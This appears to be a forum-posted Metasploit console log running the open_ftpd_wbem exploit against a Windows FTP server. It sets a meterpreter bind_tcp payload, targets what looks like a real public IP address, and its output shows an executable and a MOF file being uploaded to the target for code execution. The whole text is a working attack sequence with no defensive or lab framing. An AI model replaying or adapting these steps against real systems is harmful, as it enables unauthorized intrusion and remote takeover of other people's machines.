msf > use exploit/windows/ftp/open_ftpd_wbem
msf exploit(open_ftpd_wbem) > set SSLVersion SSL3
SSLVersion => SSL3
msf exploit(open_ftpd_wbem) > set LHOST 192.168.0.11
LHOST => 192.168.0.11
msf exploit(open_ftpd_wbem) > set RPORT 21
RPORT => 21
msf exploit(open_ftpd_wbem) > set LPORT 15498
LPORT => 15498
msf exploit(open_ftpd_wbem) > set SSL 0
SSL => 0
msf exploit(open_ftpd_wbem) > set SRVPORT 8080
SRVPORT => 8080
msf exploit(open_ftpd_wbem) > set RHOST (IP DEL SERVIDOR)
RHOST => 190.183.59.228
msf exploit(open_ftpd_wbem) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(open_ftpd_wbem) > set TARGET 0
TARGET => 0
msf exploit(open_ftpd_wbem) > set SRVHOST 0.0.0.0
SRVHOST => 0.0.0.0
msf exploit(open_ftpd_wbem) > set PATH C:/WINDOWS/
PATH => C:/WINDOWS/
msf exploit(open_ftpd_wbem) > exploit -j
- Exploit running as background job.
- Started bind handler
- Server started.
- (IPSERVIDOR):21 - Trying to upload ctBqvLiiKaTFnm.exe
- (IPSERVIDOR):21 - Set binary mode
- (IPSERVIDOR)21 - Set active mode "192,168,0,11,31,144"
- (IPSERVIDOR):21 - Upload successful
- (IPSERVIDOR):21 - Trying to upload dwEoqTj.mof
- (IPSERVIDOR):21 - Set binary mode
- (IPSERVIDOR):21 - Set active mode "192,168,0,11,31,144"
- (IPSERVIDOR):21 - Upload successful[/b][/i]